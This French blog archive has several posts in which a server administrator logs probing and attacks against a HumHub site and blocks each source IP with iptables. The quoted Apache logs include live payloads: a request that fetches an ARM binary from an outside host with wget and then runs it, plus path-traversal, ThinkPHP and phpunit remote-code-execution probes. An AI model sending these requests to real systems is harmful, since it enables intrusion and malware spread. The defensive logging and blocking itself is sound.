Archives par mot-clé : iptables

Scan de dossier par l’IP : 82.180.149.210

Publié le par
Répondre
IP Address Country Region City
82.180.149.210 Netherlands Noord-Holland Amsterdam
ISP Organization Latitude Longitude
Packethub S.A. Not Available 52.3785 4.9000

Voici la liste des dossiers testés :

# grep "82.180.149.210" /var/log/apache2/access.humhub.log | grep " 302 " | awk '{print $7}'
/
/
/git/
/git
/src/
/src
/config
/source/
/source
/sources/
/git/.git/config
/git/config
/src/.git/config
/src/config
/sources
/admin/
/source/.git/config
/admin
/source/config
/sources/.git/config
/sources/config
/admin/.git/config
/admin/config
/api
/rest/.git/config
/rest/config
/backend/.git/config
/rest/
/backend/config
/svc/.git/config
/svc/config
/service/.git/config
/service/config
/services/.git/config
/services/config
/app/.git/config
/app/config
/data/.git/config
/data/config
/rest
/bak/.git/config
/backend/
/bak/config
/backend
/svc/
/svc
/backup/.git/config
/backup/config
/test/.git/config
/test/config
/temp/.git/config
/temp/config
/tmp/.git/config
/tmp/config
/lib/.git/config
/lib/config
/libs/.git/config
/service/
/service
/services/
/services
/app/
/libs/config
/app
/cfg/.git/config
/data/
/data
/bak/
/bak
/backup/
/backup
/test/
/test
/cfg/config
/conf/.git/config
/conf/config
/config/.git/config
/config/config
/inc/.git/config
/inc/config
/include/.git/config
/include/config
/includes/.git/config
/includes/config
/temp/
/temp
/tmp/
/tmp
/lib/
/lib
/libs/
/libs
/cfg/
/cfg
/conf/
/conf
/config/
/config
/inc/
/inc
/include/
/include
/includes/
/includes
/upload/
/upload
/uploads/
/uploads/
/download/
/download
/downloads/
/downloads
/files/
/files
/log/
/log
/logs/
/logs
/cron/
/cron
/wallet/
/wallet
/wallets/
/wallets

J’ai donc bloqué l’IP.

# iptables -A INPUT -s 82.180.149.210 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

Attaque de l’IP : 193.106.191.48 (Russian Federation)

Publié le par
Répondre

Voici toutes les tentatives :

193.106.191.48 - - [25/May/2022:00:17:47 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:00:17:52 +0200] "GET /user/auth/login HTTP/1.1" 200 8276 "http://80.15.48.50:80/solr/admin/info/system?wt=json" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:01:04:50 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:01:04:52 +0200] "GET /user/auth/login HTTP/1.1" 200 8278 "http://80.15.48.50:80/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:01:47:43 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:01:47:43 +0200] "GET /user/auth/login HTTP/1.1" 200 8275 "http://80.15.48.50:80/?a=fetch&content=die(@md5(HelloThinkCMF))" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:02:38:44 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:02:38:57 +0200] "GET /user/auth/login HTTP/1.1" 200 8273 "http://80.15.48.50:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:02:50:08 +0200] "GET /console/ HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:02:50:08 +0200] "GET /user/auth/login HTTP/1.1" 200 8277 "http://80.15.48.50:80/console/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:03:29:20 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 302 218 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:03:29:20 +0200] "GET /user/auth/login HTTP/1.1" 200 8280 "http://80.15.48.50:80/Autodiscover/Autodiscover.xml" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:04:07:48 +0200] "GET /_ignition/execute-solution HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:04:38:22 +0200] "GET / HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:04:38:24 +0200] "GET /user/auth/login HTTP/1.1" 200 8279 "http://80.15.48.50:80" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:05:17:51 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 485 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:05:52:38 +0200] "GET / HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:05:52:47 +0200] "GET /user/auth/login HTTP/1.1" 200 8278 "http://80.15.48.50:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:06:24:47 +0200] "GET /actuator/gateway/routes HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:06:24:48 +0200] "GET /user/auth/login HTTP/1.1" 200 8277 "http://80.15.48.50:80/actuator/gateway/routes" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:07:41:34 +0200] "GET / HTTP/1.1" 302 5559 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:07:41:46 +0200] "GET /user/auth/login HTTP/1.1" 200 13475 "https://80.15.48.50:443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:07:55:26 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 5371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:07:55:28 +0200] "GET /user/auth/login HTTP/1.1" 200 13473 "https://80.15.48.50:443/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:08:40:07 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 5559 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:08:40:10 +0200] "GET /user/auth/login HTTP/1.1" 200 13471 "https://80.15.48.50:443/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:09:54:31 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 5559 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:09:54:32 +0200] "GET /user/auth/login HTTP/1.1" 200 13470 "https://80.15.48.50:443/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

Et comme par hasard :

IP Address Country Region City
193.106.191.48 Russian Federation Moskva Moscow
ISP Organization Latitude Longitude
Kanzas LLC Not Available 55.7522 37.6156

Mon conseil :

# iptables -A INPUT -s 193.106.191.48 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

 

Attaque de l’IP : 45.9.20.101 (Amsterdam)

Publié le par
Répondre

Voici toutes les tentatives :

45.9.20.101 - - [11/May/2022:09:56:44 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 302 218 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:09:56:45 +0200] "GET /user/auth/login HTTP/1.1" 200 8190 "http://80.15.48.50:80/Autodiscover/Autodiscover.xml" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:11:09:47 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:11:09:48 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:12:05:05 +0200] "GET /console/ HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:12:05:05 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/console/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:12:25:06 +0200] "GET / HTTP/1.1" 302 5554 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:12:25:08 +0200] "GET /user/auth/login HTTP/1.1" 200 13468 "https://80.15.48.50:443/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:13:29:32 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:13:29:32 +0200] "GET /user/auth/login HTTP/1.1" 200 8272 "http://80.15.48.50:80/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:14:01:19 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:14:01:21 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/?a=fetch&content=die(@md5(HelloThinkCMF))" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:14:38:52 +0200] "GET /actuator/gateway/routes HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:14:38:52 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/actuator/gateway/routes" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:15:02:21 +0200] "GET /actuator/gateway/routes HTTP/1.1" 302 5554 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:15:02:24 +0200] "GET /user/auth/login HTTP/1.1" 200 13465 "https://80.15.48.50:443/actuator/gateway/routes" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:16:01:06 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:16:01:06 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/solr/admin/info/system?wt=json" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

C’est pas la première fois visiblement :

# grep "45.9.20.101" /var/log/apache2/access.humhub.log* | wc -l
65

Un conseil :

iptables -A INPUT -s 45.9.20.101 -j DROP
/usr/sbin/iptables-save > /etc/iptables/rules.v4

Liste des IP bloqués

Publié le par
Répondre

J’ai donc bloqué des IP suivantes :

42.193.42.236 - - [11/May/2022:10:13:54 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
47.106.177.157 - - [11/May/2022:08:13:31 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/51.81.133.91/FKKK/NW_BBB.arm;+chmod+777+NW_BBB.arm;+./NW_BBB.arm Jaws.Selfrep;rm+-rf+NW_BBB.arm" 400 0 "-" "-"
31.44.185.235 - - [11/May/2022:07:13:08 +0200] "GET /../../../mnt/mtd/Config/Account1 HTTP/1.1" 400 485 "-" "Mozilla/5.0 zgrab/0.x"
80.94.93.125 - - [11/May/2022:02:14:23 +0200] "POST /mgmt/tm/util/bash HTTP/1.1\n" 400 0 "-" "-"
164.92.236.186 - - [11/May/2022:00:18:53 +0200] "\x16\x03\x01" 400 0 "-" "-"

Le plus grand nombre venait de cette IP :

IP Address Country Region City
42.193.42.236 China Beijing Beijing
ISP Organization Latitude Longitude
Tencent Cloud Computing (Beijing) Co. Ltd. Not Available 39.9075 116.3972

Le blocage :

#  iptables -A INPUT -s 42.193.42.236 -j DROP
#  iptables -A INPUT -s 47.106.177.157 -j DROP
#  iptables -A INPUT -s 31.44.185.235 -j DROP
#  iptables -A INPUT -s 80.94.93.125 -j DROP
#  iptables -A INPUT -s 164.92.236.186 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4